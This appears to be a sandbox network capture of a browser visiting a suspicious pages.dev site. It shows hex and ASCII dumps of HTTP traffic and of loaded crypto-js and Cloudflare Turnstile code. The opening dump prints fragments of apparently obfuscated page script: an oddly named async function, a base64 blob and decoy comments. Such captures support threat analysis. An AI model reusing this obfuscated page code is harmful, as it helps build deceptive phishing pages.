                                                                2024-08-27 18:11:24 UTC1369INData Raw: 72 65 22 3e 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 64 72 6f 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 63 6f 6e 69 63 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0d 0a 09 3c 21 2d 2d 20 3c 73 70 61 6e 3e 4c 69 66 65 e2 80 99 73 20 6a 6f 75 72 6e 65 79 20 69 73 20 62 65 73 74 20 65 78 70 65 72 69 65 6e 63 65 64 20 62 65 68 69 6e 64 20 74 68 65 20 77 68 65 65 6c 2e 3c 2f 73 70 61 6e 3e 20 2d 2d 3e 0d 0a 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 6c 61 62 6f 72 65 64 28 79 61 63 68 74 69 6e 67 29 20 7b 20 3c 21 2d 2d 20 44 72 69 76 69 6e 67 20 69 73 20 74 68 65 20 72 68 79 74 68 6d 20 6f 66 20 6c 69 66 65 20 69 6e 20 6d 6f 74 69 6f 6e 2e 20 2d
                                                                Data Ascii: re"><div id="backdrop"><div class="laconic"></div></div></div></div>... <span>Lifes journey is best experienced behind the wheel.</span> --> </body><script> async function labored(yachting) { ... Driving is the rhythm of life in motion. -
                                                                2024-08-27 18:11:24 UTC474INData Raw: 7a 4f 44 56 6a 5a 57 49 32 4d 47 51 79 4e 32 46 6d 59 6a 41 35 4d 6a 4d 78 59 7a 52 6b 5a 44 45 34 4e 7a 6b 7a 4e 6a 46 6d 59 7a 51 34 5a 44 56 69 4f 54 64 6b 4d 6a 63 30 4d 54 4d 30 4d 6d 4a 6a 4e 54 42 6b 4d 44 41 33 4f 54 64 6d 4e 7a 4e 68 4f 54 42 6d 4d 6a 46 6c 4d 57 49 32 5a 54 51 79 4e 57 4d 30 4e 6a 67 77 4e 57 4d 32 4d 6a 45 79 4f 44 45 30 4e 32 4e 6c 4f 47 56 6d 59 57 55 31 4f 54 68 6d 4e 32 55 32 4d 44 49 31 5a 54 68 6d 49 69 77 69 5a 43 49 36 49 6a 5a 68 4e 6a 45 32 59 7a 5a 6d 4e 7a 41 33 4f 53 4a 39 60 29 29 2c 20 7b 20 3c 21 2d 2d 20 44 72 69 76 69 6e 67 20 69 73 20 61 20 63 6f 6e 76 65 72 73 61 74 69 6f 6e 20 62 65 74 77 65 65 6e 20 79 6f 75 20 61 6e 64 20 74 68 65 20 72 6f 61 64 2e 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d
                                                                Data Ascii: zODVjZWI2MGQyN2FmYjA5MjMxYzRkZDE4NzkzNjFmYzQ4ZDViOTdkMjc0MTM0MmJjNTBkMDA3OTdmNzNhOTBmMjFlMWI2ZTQyNWM0NjgwNWM2MjEyODE0N2NlOGVmYWU1OThmN2U2MDI1ZThmIiwiZCI6IjZhNjE2YzZmNzA3OSJ9`)), { ... Driving is a conversation between you and the road. --> m
                                                                2024-08-27 18:11:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.549731104.18.94.414436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:25 UTC590OUTGET /turnstile/v0/api.js HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:25 UTC386INHTTP/1.1 302 Found
                                                                Date: Tue, 27 Aug 2024 18:11:25 GMT
                                                                Content-Length: 0
                                                                Connection: close
                                                                access-control-allow-origin: *
                                                                cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                cross-origin-resource-policy: cross-origin
                                                                location: /turnstile/v0/b/6790c32b9fc9/api.js
                                                                Server: cloudflare
                                                                CF-RAY: 8b9e06260b3f7cb2-EWR
                                                                alt-svc: h3=":443"; ma=86400


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.549732104.17.25.144436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:25 UTC608OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                Host: cdnjs.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:25 UTC964INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:11:25 GMT
                                                                Content-Type: application/javascript; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=30672000
                                                                ETag: W/"5eb03e2d-bb78"
                                                                Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                cf-cdnjs-via: cfworker/kv
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Timing-Allow-Origin: *
                                                                X-Content-Type-Options: nosniff
                                                                CF-Cache-Status: HIT
                                                                Age: 425786
                                                                Expires: Sun, 17 Aug 2025 18:11:25 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LoOJlTFrD6MwL%2FQ2%2BXg%2B2v0BNzZG2DVU3Ybt1%2BOiHgMTTuvmHDJ3KuR%2Bt1EXh5Qg4E8HBDtb8rzEr4gb71d8mV%2F7OK0adm4gNsuGLdZ28B7gMnwObzQDdlQ828YNfPWQcpcNGNof"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                Strict-Transport-Security: max-age=15780000
                                                                Server: cloudflare
                                                                CF-RAY: 8b9e06261c1441ba-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:11:25 UTC405INData Raw: 37 62 65 64 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                Data Ascii: 7bed!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                2024-08-27 18:11:25 UTC1369INData Raw: 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74
                                                                Data Ascii: o&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==t
                                                                2024-08-27 18:11:25 UTC1369INData Raw: 61 72 20 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a
                                                                Data Ascii: ar o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:
                                                                2024-08-27 18:11:25 UTC1369INData Raw: 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f
                                                                Data Ascii: arse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._do
                                                                2024-08-27 18:11:25 UTC1369INData Raw: 2c 32 35 35 3d 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d
                                                                Data Ascii: ,255===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]
                                                                2024-08-27 18:11:25 UTC1369INData Raw: 30 39 32 2b 28 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29
                                                                Data Ascii: 092+(e[4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)
                                                                2024-08-27 18:11:25 UTC1369INData Raw: 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32
                                                                Data Ascii: >>>6-o%4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=42
                                                                2024-08-27 18:11:25 UTC1369INData Raw: 29 2c 53 3d 41 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b
                                                                Data Ascii: ),S=A(S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[
                                                                2024-08-27 18:11:25 UTC1369INData Raw: 69 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72
                                                                Data Ascii: i.clone.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;retur
                                                                2024-08-27 18:11:25 UTC1369INData Raw: 28 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72
                                                                Data Ascii: (o),function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.549733104.18.94.414436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:26 UTC605OUTGET /turnstile/v0/b/6790c32b9fc9/api.js HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:26 UTC471INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:11:26 GMT
                                                                Content-Type: application/javascript; charset=UTF-8
                                                                Content-Length: 45035
                                                                Connection: close
                                                                accept-ranges: bytes
                                                                last-modified: Thu, 15 Aug 2024 16:28:23 GMT
                                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                access-control-allow-origin: *
                                                                cross-origin-resource-policy: cross-origin
                                                                Server: cloudflare
                                                                CF-RAY: 8b9e062aadcf5e7e-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:11:26 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 53 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 5f 3d 65 5b 75 5d 28 67 29 2c 70 3d 5f 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 61 28 66 29 3b 72 65 74 75 72 6e 7d 5f 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                Data Ascii: "use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);funct
                                                                2024-08-27 18:11:26 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 5f 72 28 65 2c 72 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 24 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                Data Ascii: e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function $e(e,r){return r=r!=nu
